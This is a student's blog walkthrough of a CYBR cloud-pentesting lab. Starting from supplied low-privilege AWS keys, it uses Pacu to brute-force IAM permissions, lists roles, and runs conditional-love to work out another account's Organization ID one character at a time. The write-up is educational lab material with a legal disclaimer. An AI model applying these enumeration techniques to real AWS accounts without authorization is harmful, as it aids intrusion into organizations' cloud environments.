Discover AWS Organization ID Via S3 Bucket

Welcome to my cybersecurity blog! I'm Basit Hassan, a student penetration tester passionate about ethical hacking. On this blog, I'll be sharing tutorials, walkthroughs, and real-world exploitation techniques that I've personally tested, to help you get started in the penetration testing field.


Today's post is about AWS pentesting using an assumed breach scenario, where the target organization provides you with low-level credentials: command line interface credentials that you can use to connect to AWS through the AWS CLI (Command Line Interface).

Let The Hacking Begin!!!!

We will be using a platform called CYBR. Click the URL, create a free account, and do this lab alongside me: https://cybr.com/hands-on-labs/lab/discover-aws-organization-id-via-s3-bucket/. This is how the interface looks below 👇👇 after creating an account and starting the lab.

Once it's ready, you are going to get an Access Key ID and a Secret Access Key. If you are new to AWS, that's completely fine; the goal of this blog is to walk you through it so that even a beginner will be able to follow along.

The first step with AWS is connecting to the account from the CLI (command line interface). That is why in this lab we are given an Access Key ID and a Secret Access Key; together they work like a username and a password. Your Access Key ID is not that sensitive, unlike your Secret Access Key, which you do not want exposed, since it is more like your password.
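For reference, once configured, the AWS CLI stores these in a plain-text file at ~/.aws/credentials. The values below are AWS's well-known documentation placeholders, not real keys:

```ini
; ~/.aws/credentials -- one INI-style stanza per profile.
; These values are placeholders from the AWS docs, NOT real credentials.
[cybr]
aws_access_key_id     = AKIAIOSFODNN7EXAMPLE
aws_secret_access_key = wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
```

This is why leaking your home directory can be just as bad as leaking the keys themselves.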

So today, with this account, we are going to do some enumeration. Our end goal is to discover an AWS Organization ID via an S3 bucket. As a beginner, like you and I, those terms are probably confusing. In AWS, an Organization ID identifies the top level of an organization; underneath it there can be multiple AWS accounts, maybe an account for Red teams, an account for Blue teams, or an account for devs. The Organization ID sits at the top of all of those, while an S3 bucket is what is used to store files.

What this lab is going to show us is how to use a tool called conditional-love to start from an S3 bucket in a completely different organization than the account we are in, and use it to figure out that organization's overall ID, which should not be possible with just an S3 bucket.

Step 1: AWS CLI Installation

The first step is installing the AWS CLI (Command Line Interface). I will show you how to install the AWS CLI on any OS you use.
1. For Linux
Copy and paste these commands into your terminal:
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
2. For macOS
  1. In your browser, download the macOS pkg file: https://awscli.amazonaws.com/AWSCLIV2.pkg

  2. Run your downloaded file and follow the on-screen instructions. You can choose to install the AWS CLI in the following ways:

    • For all users on the computer (requires sudo)

      • You can install to any folder, or choose the recommended default folder of /usr/local/aws-cli.

      • The installer automatically creates a symlink at /usr/local/bin/aws that links to the main program in the installation folder you chose.

    • For only the current user (doesn't require sudo)

      • You can install to any folder to which you have write permission.

      • Due to standard user permissions, after the installer finishes, you must manually create a symlink file in your $PATH that points to the aws and aws_completer programs by using the following commands at the command prompt. If your $PATH includes a folder you can write to, you can run the following command without sudo if you specify that folder as the target's path. If you don't have a writable folder in your $PATH, you must use sudo in the commands to get permissions to write to the specified target folder. The default location for a symlink is /usr/local/bin/.

        $ sudo ln -s /folder/installed/aws-cli/aws /usr/local/bin/aws
        $ sudo ln -s /folder/installed/aws-cli/aws_completer /usr/local/bin/aws_completer
    Note

    You can view debug logs for the installation by pressing Cmd+L anywhere in the installer. This opens a log pane that enables you to filter and save the log. The log file is also automatically saved to /var/log/install.log.

  3. To verify that the shell can find and run the aws command in your $PATH, use the following commands.

    $ which aws
    /usr/local/bin/aws
    $ aws --version
    aws-cli/2.25.11 Python/3.11.6 Darwin/23.3.0
    If the aws command cannot be found, you might need to restart your terminal or follow the troubleshooting in Troubleshooting errors for the AWS CLI.
 3. For Windows
  1. Download and run the AWS CLI MSI installer for Windows (64-bit):

    https://awscli.amazonaws.com/AWSCLIV2.msi

    Alternatively, you can run the msiexec command to run the MSI installer.

    C:\> msiexec.exe /i https://awscli.amazonaws.com/AWSCLIV2.msi

    For various parameters that can be used with msiexec, see msiexec on the Microsoft Docs website. For example, you can use the /qn flag for a silent installation.

    C:\> msiexec.exe /i https://awscli.amazonaws.com/AWSCLIV2.msi /qn
  2. To confirm the installation, open the Start menu, search for cmd to open a command prompt window, and at the command prompt use the aws --version command.

    C:\> aws --version
    aws-cli/2.25.11 Python/3.11.6 Windows/10 exe/AMD64 prompt/off

    If Windows is unable to find the program, you might need to close and reopen the command prompt window to refresh the path, or follow the troubleshooting in Troubleshooting errors for the AWS CLI.

Once you have that done, you have the AWS CLI installed.

Step 2: Profile Configuration

The next step is to set up a profile using the credentials we were given in the lab; we will do that using the AWS CLI.
On your CLI you will input this 
┌──(p3lla㉿kali)-[~]
└─$ aws configure --profile cybr
It will ask for the AWS Access Key ID; input it. It will then ask for the Secret Access Key; input that too. You can choose your region and configure everything as seen below 👇👇
┌──(p3lla㉿kali)-[~]
└─$ aws configure --profile cybr
AWS Access Key ID [None]: ***********************************
AWS Secret Access Key [None]: ***********************************
Default region name [None]: 
Default output format [None]: json

Step 3: Credentials Confirmation

The next step is to find out who we are and whether the credentials are correct. For those who use a Linux distro, we'd run the command "whoami" to check who we are; on AWS it is a bit different, so we use "aws sts get-caller-identity --profile cybr" as seen below 👇👇

┌──(p3lla㉿kali)-[~]
└─$ aws sts get-caller-identity --profile cybr
{
    "UserId": "AIDAQGYBPW3ZF7RMUWU7W",
    "Account": "014498641650",
    "Arn": "arn:aws:iam::014498641650:user/Daniel"
}
Now we know our credentials are correct, and we have the username Daniel.

Step 4: Checking the Permissions the User Has

Just like on Linux (I know most of you wonder why I keep using Linux as an example 😅 well, it's because I use it, okay!), let's get straight to the point. On Linux and other OSes, when a user is compromised we try to see what permissions we have. So we will be using a tool called Pacu; Pacu is like Metasploit for the cloud, for those who know Metasploit, hehe!!
How to install Pacu
Go to your search engine, search "pacu github", and click the first link to grab the code (I helped you out already). We are going to install it using pipx; if you don't have pipx installed, install it first, then do as seen below 👇👇
┌──(p3lla㉿kali)-[~]
└─$ pipx install git+https://github.com/RhinoSecurityLabs/pacu.git
Run this in your terminal; it installs Pacu. I had already installed mine, so I stopped it.

Once pacu is installed let's go!!

After launching Pacu, you're asked to name the session, so I named it "cybr". We will be using Pacu to check the permissions the user has.

The first thing we will do is import the access keys into Pacu.


Once the keys are imported, we try to brute force the permissions of that account using Pacu, as seen below.

After that, run the "run iam__bruteforce_permissions --region us-east-1" command to see the permissions the account has. I added the --region flag to speed up the brute force by telling it my region.
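Since the screenshots aren't reproduced here, this is roughly what the Pacu session for this step looks like. The module and command names are from Pacu's own CLI; the session name "cybr" and region are the ones used in this lab:

```shell
# Launch Pacu; when prompted, create/select a session named "cybr".
pacu

# Then, inside the Pacu prompt:
#   import_keys cybr                                    <- imports the keys from the "cybr" AWS CLI profile
#   run iam__bruteforce_permissions --region us-east-1  <- brute forces which API calls succeed
#   whoami                                              <- shows the permissions Pacu has confirmed so far
```

Treat this as a sketch of the flow, not an exact transcript; Pacu's prompts vary slightly between versions.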


I found something interesting: the permission to list roles. There might be a role that is interesting to us as pentesters; that's why I highlighted it. Now let's look it up.

After looking it up, there is a whole bunch of roles. To keep it short, I only chose the one where I knew I might find something interesting: the role "S3AccessImages". It might seem overwhelming to find a role you can use as leverage; just take your time and look for it. Here is the command I used to list the roles 👇👇

┌──(p3lla㉿kali)-[~]
└─$ aws iam list-roles --profile cybr

When this is launched, you use the Enter key to keep scrolling down the list of roles in your CLI. All I did was find a role I can use as leverage to elevate my privileges, and this is the role I found below.

We need to get the role's policy to know what this role allows the user account we are authenticated as to do. We do that with the command below.
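The lab screenshot isn't shown here, but listing the inline policy names attached to a role is a standard IAM call; the role name below is the one found in this lab (for managed rather than inline policies, list-attached-role-policies would be the one to try):

```shell
# List the inline policy names attached to the S3AccessImages role
aws iam list-role-policies \
    --role-name S3AccessImages \
    --profile cybr
```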

Now that we have the policy name, which is "AccessS3Bucket0bjects", we can get more information about what the policy allows, so we will do that below.
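Again as a sketch, assuming the policy is an inline policy with the name reported above, its full document can be pulled with get-role-policy:

```shell
# Fetch the policy document to see its allowed actions and resources
aws iam get-role-policy \
    --role-name S3AccessImages \
    --policy-name AccessS3Bucket0bjects \
    --profile cybr
```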

After launching the command, we see two resources (which I highlighted) in an S3 bucket, and the policy allows whoever assumes this role to check out what is in that bucket. But this bucket belongs to a different AWS account, and that account is not specified in the resources. So this bucket doesn't belong to the Organization ID of our account, and remember, the purpose of this lab is to figure out the Organization ID of that bucket; once an Organization ID is obtained, it can be used for further attacks. So we will be using a tool called conditional-love.

Conditional love

conditional-love is an AWS metadata enumeration tool used to enumerate resource tags, account IDs, org IDs, etc. Since we are trying to find out which Organization ID this S3 bucket belongs to, we will be using this tool.

How to install and use conditional-love for enumeration 

Go to the URL https://github.com/plerionhq/conditional-love and grab the clone URL, which is "https://github.com/plerionhq/conditional-love.git". Then go to your terminal and input this command to git clone it:
┌──(p3lla㉿kali)-[~]
└─$ sudo git clone https://github.com/plerionhq/conditional-love.git
[sudo] password for p3lla: 
fatal: destination path 'conditional-love' already exists and is not an empty directory.
I got that error because I already have it cloned. The next step is to cd into the folder and ls; you will see there are some requirements in the requirements.txt file. We will need to set up a Python virtual environment so we don't break all of our Python packages, so follow the steps in the screenshot below 👇👇
Once you cd (change directory) into conditional-love and list all files, use the command python3 (since we are creating a Python environment) with -m for module, then venv, since what we are creating is a virtual environment, followed by the environment name; I used "condenv", but you can use anything. Then use "source condenv/bin/activate" to activate the environment and install all the requirements, as seen in the screenshot above 👆👆.
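The screenshot steps boil down to these commands (the environment name "condenv" is just the one I chose; any name works):

```shell
cd conditional-love
python3 -m venv condenv              # create the virtual environment
source condenv/bin/activate          # activate it (your prompt gains a "(condenv)" prefix)
pip install -r requirements.txt      # install the tool's dependencies inside the venv
```

When you're done with the tool, `deactivate` drops you back to your normal shell.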
So now let's get the Organization ID. To learn the syntax of the command, you can launch:
┌──(condenv)─(p3lla㉿kali)-[~/conditional-love]
└─$ python3 conditional-love.py -h 
That will help you in using this tool. Below is the syntax we will use to get the Organization ID. I won't drop the full Organization ID I got; I showed only one letter in the screenshot, so make sure you get yours in full to solve the lab.

So what this does is brute force the Organization ID (i.e., try all possible combinations of letters and numbers) character by character, based on how AWS responds to each request. Remember, this works because the resource we saw in the policy, "arn:aws:s3:::img.cybrlabs.io/*", does not belong to the Organization ID we are authenticated with. Conditional Love uses the role we found to try to assume its permissions and access the target resource.
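To make the idea concrete, here is a tiny self-contained sketch of the same prefix-oracle logic, with no AWS involved. A mock "policy check" only tells us whether our guessed prefix matches, and that yes/no answer alone is enough to recover the whole secret one character at a time. The secret value here is made up for illustration; in the real attack, AWS's allow/deny response plays the part of check_prefix:

```shell
#!/bin/sh
# Made-up org-ID-like secret; we only ever "see" it through the oracle below.
secret="o-ab12cd"

# Mock oracle: succeeds if the guess is a prefix of the secret,
# the way a StringLike condition "guess*" would match.
check_prefix() {
  case "$secret" in
    "$1"*) return 0 ;;
    *)     return 1 ;;
  esac
}

alphabet="- 0 1 2 3 4 5 6 7 8 9 a b c d e f g h i j k l m n o p q r s t u v w x y z"

# Extend the guess one confirmed character at a time.
guess=""
while [ "$guess" != "$secret" ]; do
  for c in $alphabet; do
    if check_prefix "$guess$c"; then
      guess="$guess$c"
      break
    fi
  done
done
echo "Recovered: $guess"
```

Running it prints the full recovered value, even though no single query ever revealed more than "prefix matches / doesn't match".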

As seen in the conditional-love enumeration, I will explain each flag 👇👇
python3 conditional-love.py:- the tool itself, run inside the virtual environment we created.
--role:- This takes the ARN of the role "S3AccessImages" to try to assume its permissions and access the target resource. Remember, we got the ARN when we listed the roles and found this role.
--target:- the resource "s3://img.cybrlabs.io" we found in the policy, which doesn't belong to our Organization ID.
--action:- "s3:HeadObject" is an AWS action that checks metadata about an object in a bucket, like size, last modified date, etc. The tool tries all possible combinations, one character at a time, in requests made using the role we supplied.

AWS checks the request against the bucket’s policy.

  • If the partial Organization ID is wrong, AWS returns a generic AccessDenied error immediately.

  • But if your guess is partially correct, AWS might return a different error (or even let the request go deeper into policy evaluation).

Conditional Love observes these differences. It watches the response and infers when it's getting closer to the correct Organization ID.
--condition:- The condition is "aws:ResourceOrgID", since we are trying to brute force the Organization ID of the resource we saw.
--alphabet:- since we know an Organization ID consists of alphanumeric characters, each character could be any of "0123456789abcdefghijklmnopqrstuvwxyz"; this is like a custom wordlist for those familiar with brute forcing.
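Putting the flags above together, the invocation looks roughly like this. The account ID in the role ARN is the lab account from Step 3, but substitute the exact ARN you got from aws iam list-roles; the flag values are the ones described above:

```shell
# Sketch of the conditional-love command assembled from the flags explained above.
# Replace the role ARN with the one you got from "aws iam list-roles".
python3 conditional-love.py \
    --role arn:aws:iam::014498641650:role/S3AccessImages \
    --target s3://img.cybrlabs.io \
    --action s3:HeadObject \
    --condition aws:ResourceOrgID \
    --alphabet "0123456789abcdefghijklmnopqrstuvwxyz"
```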

I know how overwhelming the syntax of AWS commands and IAM policies can feel; you're not alone. It's not necessary to memorize everything. The key is to keep practicing, and over time the patterns and logic will start to make sense.

With the help of generative AI tools like ChatGPT, you're never really stuck; when something confuses you, just ask. Whether it's understanding a permission boundary or crafting a valid assume-role command, support is just a question away.

Consistency beats cramming. So keep breaking things (safely) and rebuilding; that's how you truly master cloud pentesting.

Summary

In this lab, we demonstrated how a compromised IAM user's credentials can be used to:

  • Enumerate AWS Identity and Access Management (IAM) roles and permissions.

  • Exploit S3 bucket policies to discover the AWS Organization ID.

  • Use tools like Pacu and Conditional-Love to automate privilege escalation attempts.

  • Learn about real-world AWS misconfigurations in a safe, hands-on lab environment.

Understanding and practicing these techniques helps reinforce key cloud pentesting concepts such as assume-role abuse, IAM privilege enumeration, and sensitive information discovery.

Disclaimer:
This blog post is for educational purposes only. All activities were performed in a controlled lab environment provided by CYBR's Assume Breach: AWS Edition.
Do not attempt these techniques on any systems or cloud accounts you do not own or have explicit permission to test. Unauthorized testing is illegal and unethical.

About the Author

Basit Hassan

Cybersecurity Enthusiast | Student Penetration Tester

Basit is a passionate cybersecurity learner on the path to becoming a well-rounded penetration tester. I don't limit myself to one domain; I'm diving into web, system, network, and cloud security to understand how attackers think and how defenses work. Through this blog, I share hands-on experiences, labs, and write-ups that simplify complex topics for anyone starting or growing in this field. My goal? Learn, break things (ethically), and help others do the same.
